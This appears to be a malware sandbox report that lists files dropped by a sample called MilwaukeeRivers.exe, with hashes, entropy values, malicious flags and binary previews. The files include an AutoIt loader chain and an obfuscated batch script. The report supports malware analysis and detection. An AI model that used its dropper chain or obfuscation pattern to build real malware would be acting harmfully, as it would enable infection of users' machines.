                              Preview:..y...._.4..E..G=..>......2..,.}...8..0.AQu.|)fFHYv.^......h}...K......o...E..c.nt.E...8...f.c....Cmg.....m.l2}.y.~.d.I~OJ...9.{P..&+.N;..*2..Xg...K.y.{.....'.^..VW.r.B{...e...@O./FL..f.2.F.v.'.....vo...!d^Q*...d..Z8.|.^$4.&A>.?s.n.8&.n.F....}...d5X..U...Y..# =.$<w.~...<et.W..?.#.....'@^..#.Z.bAC...km.....G....E_...^.W[k_<B..;;u....ry.&7.m....#......Gk.._=Ub~.,.W{3.n'..b.w"..%c...<.rk.....?.n..J>.4^.O.=.j.Y.c..>.{..D#.v 7_v{....Yu.".`.w.C+..j.k\.x.d./^..3...67`.XJ...Zc3..I.......dz..v."...Sx...8 ....._:..U2...U...e...C....j......5.y....3bG.L#.#..M.hg.t..)..j..4.%k6.3...cE.T.^...)j...!..........'..WW./=C..!u..Qhfj.YW#.k..;.w&....v/....2`..;O.~Qq..P4."....S.l..;..9..[^./.}m.5..C/.1..'...........E..e.C.90&..Y.(y6..,,g..O.R;..nT]...>.?.....NK..`.....[...9.]+...`..y:..<.Zp...lso..z.....$j....^...1Q&.).......|.}.>1...~.J.^...&..B...Q....X$U9..)...?.:...c.7.....:....!.-*&...c..f.c.+.Jw;.....KQ3..3..m.......r.u1.1.~....[6}..Wo.V.&.%...X...AP..

                              C:\Users\user\AppData\Local\Temp\Commitments

                              Download File
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6824
                              Entropy (8bit):6.189007519474476
                              Encrypted:false
                              SSDEEP:
                              MD5:95B88AAC08C10ED0630BFF6E25A48D22
                              SHA1:AD839FFE077B94D8AA26523557826B66268DB8AD
                              SHA-256:7C047D4BD015BF4DB77FA60EDADD2CD71A0969C8B6BA68C7A1799B63AB3A4ED3
                              SHA-512:5342208EF56103E9329F877AEC12FC3E85DCA2E1363F21960C8293841F0093463A16298CCB8BE6D418835FEBFB3E3E10CEE5336BA342A5D170942186974590A3
                              Malicious:false
                              Reputation:unknown
                              Preview:GeologicalAllowStoryVirtually..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\Etc

                              Download File
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):78848
                              Entropy (8bit):7.9977852984731435
                              Encrypted:true
                              SSDEEP:
                              MD5:A2E6F3D6B4B15803FC39DB66D53D5A68
                              SHA1:4D9E598B94C8A1C3F88A7D70C72C726B306B7DA1
                              SHA-256:FC1405B7240E36717D575F651D792DB859226FF4EA8EA80773BF7200B6A582B8
                              SHA-512:56254F9A620FB0E38E8252A8CC1DD7D0E599D9C4854FFB8CA69771EF9FB0B3DEB6508492D4D2095AB8B7E1BBC0F381DD9FE743D1161CA344F4445D1C5E1B811C
                              Malicious:false
                              Reputation:unknown
                              Preview:Q ....n..;k..O..I.hN47.3`...H2R...3.VC.,.~.=g.......j..^.r.....D.KT....m....A.hY3...9~}{.`..@./<..&x............W....J_..9r....E..-..I..h.H....|&;.e.......5F..{...]`j@A..8.*......-.%.PP.....+.qG...d?.5......../S.i.`c.j._...J.p.2.wG.i>...s.k-..3..3N)Y2.W.9.....;...LA(X.-..m......K..T...m.l.k..v..[..."$..>..]. X..rv;zUn....?..%....[...t.Jt%....d.w.$&...#x.g\1.#.9.*.}s.VX...k..[;I./(m...$9..h.....#..d.,Z...u).r...."..7.+./e|.c............BP..k...!~.K.H..lh` .-.......i.]L.<..H]....)qA.R..<.Q....h.N....5.`f..|...x.-...J0...,...-O=.6....6s..r.h.Agy].kS2....&.AP.N.c...6.w....N.{..#..".).i.......Z.R..'.Hz.UA..NN.^|.d..q."??Lo...........O.&x......@JR.t[jX....YIL.....rPsD.{~.s1.&$.o.-..~..i0{p.Q..zY..V.......1..<0g..~.I......=j....7...Pg..... .ywo...g..cI...WG..,t...\...{....K..p....8.Fb9.e..c....*......_..9...S.w.{.-i..[....E.........(.f..,;V...#f.....*<TB..:......E.t:.F1._....<.p8GM..A.vW.Q......l.Q3..-.....X..z..o*..j...Wk'..ee...L.}=...y

                              C:\Users\user\AppData\Local\Temp\LRAKKJ\Afflicted.a3x

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\215655\Comparing.pif
                              File Type:data
                              Category:dropped
                              Size (bytes):5997423
                              Entropy (8bit):6.287585437318969
                              Encrypted:false
                              SSDEEP:
                              MD5:D4415DE41B124DCA4E6221F3C72D326E
                              SHA1:9A1948836322ED714D46EEF7D7660A7FE1B3384F
                              SHA-256:604673E6EDB9EDFC4B68DD8DF2CD825AAFAC39093F145AB080A0810E4D580FAA
                              SHA-512:F8F2307187A23126903C052956E5BD82EB70F759F5C0B1E5C1CB7101A0D6686FEBE4D28B1566BDD482411493617FC01FC02188CFC2B3F559E60C6124D77311F8
                              Malicious:false
                              Reputation:unknown
                              Preview:]$t...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................]$t.....................................

                              C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\215655\Comparing.pif
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):943784
                              Entropy (8bit):6.621472142472864
                              Encrypted:false
                              SSDEEP:
                              MD5:3F58A517F1F4796225137E7659AD2ADB
                              SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                              SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                              SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\Lingerie

                              Download File
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):78848
                              Entropy (8bit):7.997868077838998
                              Encrypted:true
                              SSDEEP:
                              MD5:2F47E917AB451B39DEE57628583E0E49
                              SHA1:9A5323F7F24A7D98ACB6AD484F39AE2211297DC7
                              SHA-256:FE0DE264E44FE42611AD2FAAFA7A97D45C48DE38F251CBC446913611F170E3EB
                              SHA-512:71044CF3E0848E8D7BAC6666E452690EF2EE623F408477F815235D0F737B1EC200F44152BFD59616BCD8DB538765337C62019F3FF5A122C3FD6F6E8EFF16F0C1
                              Malicious:false
                              Reputation:unknown
                              Preview:!.\N*...z~..^.9.)"G...^.V.\.YUC8.Oe..#.a./W................^..3.....;..K..xS)......I\..qq.J>.C..4.&........uLYK..{...../....$.Z.T.A.....X...lRgQ...[......=*.a.$.q..!..k........68o.1..K.u...nT......JB"`E.rf...P.x.......;...?8....ec%.....4w..k...g>F:....'..K....6.|......$.3CG$..#..B.l.~..5.f/S..".P..o.?......A...5Hi.?..MH..4..7a./..ap4..k.......3....q.b~..EV.....n#.Pc..>-%l.."eA-.@.R..8.yB...:..P..nM,.B..........9...|..d..[3z0.^.0..M....uj1.....Xb`L7Np..gk.)V..w..m.a.~.nB!H..LW............d*..U..Ku3...`fi1..;.2..>@..I.n.=C.4.J/w...A.sA...o.....{j.VPY...w.H"..f{N&..K....A....(...w.j.L..\1.MC...Z..(".\..@.Ee"...t#..:h."t.....9..+.}f.3..Y.E....;/..M..E...:.7JPH..B...1/_....i....LY.].....m|j....b.;.q...Lp.V..Cx4..&(:..gv..{<.f....h....a..b.!^DY.bL......b.0'.R....R..Q....kk!.v...BU..K.jd..2.5u..8."....p.....<..l,. .......w...%...i.+.Y...{..H.t..</...V...%}.j..B...FL.9........0n.^$...$..-&:..>.nE$./p.....j].1.i3ubx......p....t*.H@.k.L3].

                              C:\Users\user\AppData\Local\Temp\Mate

                              Download File
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:IRIS Showcase file - version 5
                              Category:dropped
                              Size (bytes):886815
                              Entropy (8bit):6.622132459564823
                              Encrypted:false
                              SSDEEP:
                              MD5:25C0CCA1B4B6C482FD0135E0E5E747A0
                              SHA1:339571736C2FC5CDE1AD6F9E7DC58EE62A863C63
                              SHA-256:1DE377CC55C433743B916DE2CFABDA2BA5E73FF825F3E7F968AD8905BDD8DFB4
                              SHA-512:A5B2ADE00F9F896578F97FECCD320675FA1C2824934549352EDC9BCB39CA411278EA8A91F0649C3A1AAE3C46EE6B6F9B25BB6E2D0AFAEE57DC35BF50843B2089
                              Malicious:false
                              Reputation:unknown
                              Preview:.......................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.|.....a....}..t...|...;............}..t......._^[..]....}....t.....x...|......U...M.VW...........|P;......H.Bt.......t<.u..@....M.....B`....8.t".....|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...wL.W.....wL...wL...wL....wL...wL....wL....wL..=.wL....wL..

                              C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\215655\Comparing.pif
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):14307528
                              Entropy (8bit):7.770087919251095
                              Encrypted:false
                              SSDEEP:
                              MD5:8FE60FF1954FF81AD6CAFF83914CF088
                              SHA1:B122B875DB7C48D00C719490A9183248CDDB90F8
                              SHA-256:F87EB3E54A164B62874F6D3F20EB1D1AB118FBEAB62F156066A7EDA88428DEB3
                              SHA-512:2061EA43CC34D280AE5E3E31DE9C43B408105930F9546360C6B93A32F13CA581A4BE518F60FEA79C73239F41793F0CED33972E37A30A6C53AA55300F9883CD53
                              Malicious:true
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.~.T.-.T.-.T.-.,J-.T.-."W-.T.-."c-hT.-5.Q-.T.-.T.-.T.-.T.-2W.-.,Z-.T.-."b-FU.-."S-.T.-."T-.T.-Rich.T.-........................PE..L...ir.b..................1..j,.....;.*...... 1...@...........................^.....T,....@..................................j<......0?.Lx..........`!..h/....Z.&....31.............................................. 1..............................text.../.1.......1................. ..`.rdata..t.... 1.......1.............@..@.data...\e....<..T....<.............@....rsrc...Lx...0?..z....>.............@..@.reloc........Z......zY.............@..B........................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\215655\Comparing.pif
                              File Type:HTML document, ASCII text, with very long lines (8793), with no line terminators
                              Category:dropped
                              Size (bytes):8793
                              Entropy (8bit):6.1671840102708
                              Encrypted:false
                              SSDEEP:
                              MD5:31272E78B575FF9A69A13DEBFFFEF7EF
                              SHA1:2BC8B5201149B6A6A2A40D9C30283834989852C5
                              SHA-256:C80879950C53EC491785222A2FA5854422EB0EF41D33BC9E85F3053CFD2437E6
                              SHA-512:12348C454529101C3CB902A9C54753C5ABAF37B15DB14E4A8AA8AF1010F92CA420C3902E8A6F26B455457DA6694EAC6281A620DE2B4B14734AFD0759C855A0FC
                              Malicious:true
                              Reputation:unknown
                              Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i

                              C:\Users\user\AppData\Local\Temp\Reliability

                              Download File
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:OpenPGP Public Key
                              Category:dropped
                              Size (bytes):61440
                              Entropy (8bit):7.997145288719872
                              Encrypted:true
                              SSDEEP:
                              MD5:8C746CED3CE86327E752383866D630D8
                              SHA1:3D6BEFC5AD1E28419AD7834DAE43A2B51DBB818A
                              SHA-256:E7DB8C4FDA3F419F74F3939AF4984A4FF079541B02843D6805B048D8BDFF0421
                              SHA-512:06B54B6279B80AAB06D1E47C221058CAE54FA5B9C875FC3C7F4D82F90DBC4ACCE9B246B678056C2A3D45493B82CEDDCD5E2420CA4014C15CD9093CEE2B0F27DB
                              Malicious:false
                              Reputation:unknown
                              Preview:..md6*...8YqTcJ./...n.....t...[yar.........45.yW#...-:Y....>. X.,Q..........Z.iI..W.#..$M4.L....nv-.......[..S.=;.....ug...Oz?.Aq.......FLb...N,!..==..{..W..=....[...k..>....py#...k~..........,...T...#7.....J.KB....d.....#C.v.v.P,a'w.J..HR.Cw.j.6.2>V<.q0.FT..L...L..z.ij2.=xp... ..{...AW ..........y..v........f.].M....Kb..Tb.K......u.SW ..D..D)...!..".H..$e......." .SL.nR..f.|,2u.jz....B.a.x.6..9.o....Y..B.0p=B.....+:3.v.Z.m.<....3..a.6|DK..1^?:|..w...3QL..4...;......pV.....+..q....y,.X\.....~k.&. .W.J..n._~......A.......ND.dO(g..B...<..&.G7...17.1..N.O..x.E.X..yF~.JH.0...G..E..'.<.*DH..4..%.*..1l...#..v#...c..fX.C.....qb{Va.Hz.....S...P.Y....z...m.Q...alF.^...s.....U.`.....a.9..T....w.Jq...:.S..VQn.x.2.)UP..O.e....G.=....J..>.......iB.>..B.Z......@....9..............=.F...{h...MI...Llw}..3R.X.|.L.J..h..I....T.^..rEF...'.@b.R.s.......y.....h....'&..ct.....t....B.P..v.F...G.4ig....H.@.?.r...zq...6T...~.....Vf...W..2X...&.P.x...kpl...._(..D...b...

                              C:\Users\user\AppData\Local\Temp\Seek

                              Download File
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):90112
                              Entropy (8bit):7.998166501855411
                              Encrypted:true
                              SSDEEP:
                              MD5:54C81389F168A434CF19946888499A41
                              SHA1:3BCB690DA7B8809DDF88E833A47DACC04633BC80
                              SHA-256:C9766C34FF13CBB3B62AFBC794BC79171E1D573B5D4E2E3FF2C4B21885D537F6
                              SHA-512:61A2A3B2DCBCA67CA41E5BB96BBA3D31C4F17D491F6430F5B1584CA083310A4D4ADB612B5BAA6561B0AA5966BA062A0BA85A09E09065F0EC149EACD665328394
                              Malicious:false
                              Reputation:unknown
                              Preview:.M.......u.>.........B)k.....&T.`..np.......[..d.,. ..f..$N...M.]h1....#.9.`..V..q....&W...J....M.S....NB..TR..,.RIm.......m.nj.........~:.:_...lV..:.l....]>....{.P)...vF..E...z..Kv[..l...v.....[.'...9SX.,L......]...".-p.VE.ui..O...P.'I.4).y._..$..V....}$8..]..^...G.e.._.6.l/...H.7...t...C.T ...@...T..cjf...Q...."...>|....C.n.\.3.28.?...6!.HP.J@p.d!.};)AT..Z...JN......)...?.E..mr....)M.<..#......./.cN..X.....".z.......j.!.5..u[.6......k"g..-P...jx.=|s8...0.q.[.=.X..pn...5...H.1.M+.9...A.^.....)D$....\.(<...+\..Ji..V...I5...xW.{&O..67.'..x..fX. nVi...Y.`^.7......y....j_./.n.5.Qd.X>.j..:....}..5&[.%...M.S..'...F.4E-6.h..0...g...h[....f.$.S...8#..6;....R....bwk...$P..t..X..=.....-..+.Ho.J........)......crp.U@...IvHn.t.....!.o....W.C.S.....v ..l&JA......[...c......*T.3.'q2. /.C..#..I.=.hQ.............".G.7.....fQ.G..i.|..m.%.uXE..s...x.qy..4<.QiS..Ey.,.P.Y.Y...t.D.....:.^.v"0lU..|.y.....VA\.~F.1{C...)p<..z./n-.&.}7....Na7.*..

                              C:\Users\user\AppData\Local\Temp\Spend

                              Download File
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:OpenPGP Public Key
                              Category:dropped
                              Size (bytes):92160
                              Entropy (8bit):7.998254921403739
                              Encrypted:true
                              SSDEEP:
                              MD5:3B05748621287F6259899970EF155A38
                              SHA1:DEF8ACF6355FBE03C1F369C86475A1880755FCB2
                              SHA-256:450619A5707D27235F489C4F5B6DBAA953405B7907DD23C03C6CCAC08E1187A1
                              SHA-512:787FCBAC6A9CEA27F2033BDCE73C0390D1C8C74D7FBD857FEC66EFB4D679A9981EC095D289801C92CAFC4D5CFB6747F6FCE87619D55C5ED10927D25731E9B0A4
                              Malicious:false
                              Reputation:unknown
                              Preview:.3d=..;.....#p.1Y...d....~V..\j..r=...m..^Oy*..x..Br.Q..........6.I..5.*R....'..].Z.M..8..J.....oC.G..53.Kn...HU.O.^f.z..Bj^5h$f..k._}f....]....X...y>..jV....A....0....|.M.c6..SA.....W...7>.e.(..+.....+|....Ho......8u.....MT.gR.H...P?..C.]..e..2h.....5.....K3~.Q.j.......~..)w.Q.."...|9.DL...(.mOB'.....{.. m.n...9.i.y'w..#3...+!I.].|.j.0.._.....l..g...........D..$.g:7MoM2f./.M.7~..z......_....../.JL.f..n..Z.*.......R.% QJ.[.i.gZI{A._....5..0.'.&rw..+.....J...}S.#..;jj\..s.......6../....5q......H."I..O...V.i...3.h.h../F...4.k..O..P...v...Kc.0....+c|..z...;...QXt...'x.H)..tR....^.,.....J.....C._e.w..R"M...nsd.Y....3...ij.I.`T.n..0n1u.$=o.9..t.W.@....].$....f..W.LF._..3#...0='...A.DVs...N........R............a..ns...7...#R..A....L.T.x...VE....?g.%{.&'..%.O1...'+.......Zv.?F|...A......MP`...Y._.b.wM.4.......Q>.^.C.o..@.....*....EP.q.p..o.78..m../.L.(...Y.|...{.&!....t...qKy.:...'........Z1..w.%n.....R.G4.H......t..v+..\..`..!>z......k.._m..$

                              C:\Users\user\AppData\Local\Temp\Started

                              Download File
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):88064
                              Entropy (8bit):7.9979669964896765
                              Encrypted:true
                              SSDEEP:
                              MD5:6517AA64B07030E6916DFAA84C900553
                              SHA1:40DE8C112F344C59E045E3BCD9D7F9F9CB427D7E
                              SHA-256:3BFC145B382F207A3ADED6E9AC0BC61F07C94C0B81658FD43CBB741A1AA7FEFE
                              SHA-512:AD71D36193B99219E36CDA11DC98BD4D44768C6EA0557F76C1902286942317A66CFAB6359D36A7439EC7E30CA85041941E55D5BB77ABBE9EB10183C7F7B8C7F6
                              Malicious:false
                              Reputation:unknown
                              Preview:..y...._.4..E..G=..>......2..,.}...8..0.AQu.|)fFHYv.^......h}...K......o...E..c.nt.E...8...f.c....Cmg.....m.l2}.y.~.d.I~OJ...9.{P..&+.N;..*2..Xg...K.y.{.....'.^..VW.r.B{...e...@O./FL..f.2.F.v.'.....vo...!d^Q*...d..Z8.|.^$4.&A>.?s.n.8&.n.F....}...d5X..U...Y..# =.$<w.~...<et.W..?.#.....'@^..#.Z.bAC...km.....G....E_...^.W[k_<B..;;u....ry.&7.m....#......Gk.._=Ub~.,.W{3.n'..b.w"..%c...<.rk.....?.n..J>.4^.O.=.j.Y.c..>.{..D#.v 7_v{....Yu.".`.w.C+..j.k\.x.d./^..3...67`.XJ...Zc3..I.......dz..v."...Sx...8 ....._:..U2...U...e...C....j......5.y....3bG.L#.#..M.hg.t..)..j..4.%k6.3...cE.T.^...)j...!..........'..WW./=C..!u..Qhfj.YW#.k..;.w&....v/....2`..;O.~Qq..P4."....S.l..;..9..[^./.}m.5..C/.1..'...........E..e.C.90&..Y.(y6..,,g..O.R;..nT]...>.?.....NK..`.....[...9.]+...`..y:..<.Zp...lso..z.....$j....^...1Q&.).......|.}.>1...~.J.^...&..B...Q....X$U9..)...?.:...c.7.....:....!.-*&...c..f.c.+.Jw;.....KQ3..3..m.......r.u1.1.~....[6}..Wo.V.&.%...X...AP..

                              C:\Users\user\AppData\Local\Temp\Te

                              Download File
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:ASCII text, with very long lines (1184), with CRLF line terminators
                              Category:dropped
                              Size (bytes):24072
                              Entropy (8bit):5.104729060087426
                              Encrypted:false
                              SSDEEP:
                              MD5:1E40CFD6DFE1B3C142469BEC11EB51F7
                              SHA1:0E13C823035CBEC02E0745E1970BFB7F3BDAA1BC
                              SHA-256:D720FF2AC7655230DC5CF3512402471CE822E7DEA81E3CD6121BA34F93081C1E
                              SHA-512:3BFAC352F9A61D151A2B217A893CA2E0C2819CF5E06A7C39D60F0FFF8481482BDE885596D4AAAACC0EBA97F5E8D030937315D1DF5EBC6768E0E7BDC8893837D4
                              Malicious:false
                              Reputation:unknown
                              Preview:Set Private=f..cHWorn-Cosmetic-Qualities-..FqOaWomens-Address-Scheduling-Analyze-Gi-Hypothetical-Certainly-Evaluated-..FwRhythm-Endif-Brands-Addressed-Stopped-Elvis-Filtering-..jEVSTranslate-Upload-Sequence-Accessories-Tie-Dead-Objective-..SOVNBuffer-Proc-Quit-Republic-View-Serial-Offered-Mails-Cylinder-..Set Shopper=B..JmwgGabriel-Ownership-Age-Rotary-Designs-..cUMpeg-..qhZKStarring-Editing-..TVNIndonesian-Phi-Skirt-Modification-Transmitted-Poem-..aNriBrooklyn-Collections-Emma-Of-..Set Scientific=e..MRZFinance-..YvwrWrapping-Xanax-Gamma-Estimated-Nuclear-Biology-Advert-..RVTFishing-Cast-Girl-Staff-Seo-Drivers-Meal-Repair-Ft-..oqSmith-..PvXQMortgages-Player-Sector-..Set Index=G..HJDemanding-Applicable-Hazards-..MfpDVideos-Remix-Visibility-Encourages-..aJpControversy-Questionnaire-Distances-Admin-Hundred-Probe-Worn-Indiana-America-..rJFinance-Programme-Near-Variable-Wr-Assumption-Adjusted-..URTNv-Taking-..WREPFalls-Identity-Web-Accent-..FLEaster-Doug-Volume-Karma-Pj-Completely-Guardian-

                              C:\Users\user\AppData\Local\Temp\Te.bat (copy)

                              Download File
                              Process:C:\Windows\SysWOW64\cmd.exe
                              File Type:ASCII text, with very long lines (1184), with CRLF line terminators
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:1E40CFD6DFE1B3C142469BEC11EB51F7
                              SHA1:0E13C823035CBEC02E0745E1970BFB7F3BDAA1BC
                              SHA-256:D720FF2AC7655230DC5CF3512402471CE822E7DEA81E3CD6121BA34F93081C1E
                              SHA-512:3BFAC352F9A61D151A2B217A893CA2E0C2819CF5E06A7C39D60F0FFF8481482BDE885596D4AAAACC0EBA97F5E8D030937315D1DF5EBC6768E0E7BDC8893837D4
                              Malicious:false
                              Reputation:unknown
                              Preview:Set Private=f..cHWorn-Cosmetic-Qualities-..FqOaWomens-Address-Scheduling-Analyze-Gi-Hypothetical-Certainly-Evaluated-..FwRhythm-Endif-Brands-Addressed-Stopped-Elvis-Filtering-..jEVSTranslate-Upload-Sequence-Accessories-Tie-Dead-Objective-..SOVNBuffer-Proc-Quit-Republic-View-Serial-Offered-Mails-Cylinder-..Set Shopper=B..JmwgGabriel-Ownership-Age-Rotary-Designs-..cUMpeg-..qhZKStarring-Editing-..TVNIndonesian-Phi-Skirt-Modification-Transmitted-Poem-..aNriBrooklyn-Collections-Emma-Of-..Set Scientific=e..MRZFinance-..YvwrWrapping-Xanax-Gamma-Estimated-Nuclear-Biology-Advert-..RVTFishing-Cast-Girl-Staff-Seo-Drivers-Meal-Repair-Ft-..oqSmith-..PvXQMortgages-Player-Sector-..Set Index=G..HJDemanding-Applicable-Hazards-..MfpDVideos-Remix-Visibility-Encourages-..aJpControversy-Questionnaire-Distances-Admin-Hundred-Probe-Worn-Indiana-America-..rJFinance-Programme-Near-Variable-Wr-Assumption-Adjusted-..URTNv-Taking-..WREPFalls-Identity-Web-Accent-..FLEaster-Doug-Volume-Karma-Pj-Completely-Guardian-

                              C:\Users\user\AppData\Local\Temp\Washing

                              Download File
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):20170
                              Entropy (8bit):7.992542334324972
                              Encrypted:true
                              SSDEEP:
                              MD5:93654B776416F68061F5812121D460E3
                              SHA1:917BE2E9A18B06F4B49C9F506FAA596D8DA4084E
                              SHA-256:6CFB0951411A034C4B06886A3D8BBBE1B58C988C8280183D0409B49AA4069D92
                              SHA-512:6F0DAE32FA26E7F02D1B781E7837D971B8E4FDAB7EF03DF2B1082CA9C7CC048DC23BBF092D827E2FC46B2FD293A26D1BDAEAFF34D5C62D4A20B44C2C17CD4570
                              Malicious:false
                              Reputation:unknown
                              Preview:.\w;..i..!...{..E.R.T.Y.].O..>I.CI:..-H{./........,TM.7Z...`..j.T .zq...e....t/)....f..9.J....dF...j..O"4..)j..TT=.....h.M^.Y.m.P3i..l L.X..g.r(.2,.....w...e..Q.?...j........Rb.........8=.....lu]..R.(..VE..........{..F?.V!..bs|.....97.....R.@......K...t...V.y.. ..I.g7Y.LC.n^.<....bx..I..B.Ib.P..i+H....r......(..%.(2^&g.e.*.M..)D...m.%@s.Y-b..]...w.m.|.9Vo.).9...kp....c.7........-..)..L..^...ke...k...nJ.txe.._f0..B.J.......1zSiD.F.._j... ....=|...j...~Ad.....h..P.|.&!...u.T\.1K.a......O.#.rt..+.+B...H..+.......X.y..<...#>_]..K.y..e..<.z..%rz.^..@\e.4..O.].L\".........................u...'HC.....s....esv1.n~......r[.&.j.6.'.5.pO.......7..5M...m..Q''.P.q.#...D.4&.....!k.....9.S...)....-....].,.0...<.<..IXd.(Ul.4-..A..T.VM.A...P.j...7.-...;..WdW...V.... .;.E......Z"......h....:...r.B....<4.....r....T.f..VL.K:.ww.4...a.E....y..'....E(.cP....l.~......p .j...}.V.......(..~...........7.g.7eq....t....&+.'...%..s.}.y....F..=....i..D...

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0e0jqcjn.ogw.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:unknown
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\f9203d0c

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1276807
                              Entropy (8bit):7.678578723271913
                              Encrypted:false
                              SSDEEP:
                              MD5:F7C2901D99FEE2A139DAE790E876A6BE
                              SHA1:8DEA978EC46B449325F2B21F69579B197FEC74E7
                              SHA-256:F734B2177245A47BA77E17D5D42181D4F52AC7B643F315B87B1D19778B06CB16
                              SHA-512:3B10737E71E5158F17C82BE9E7215C8F1A31B16BB47518FBDF78DB87E5F8E28A89DBF45236A3B0D09ACFB70A94780874D74FF5E892956C039B261B3E40C96276
                              Malicious:false
                              Reputation:unknown
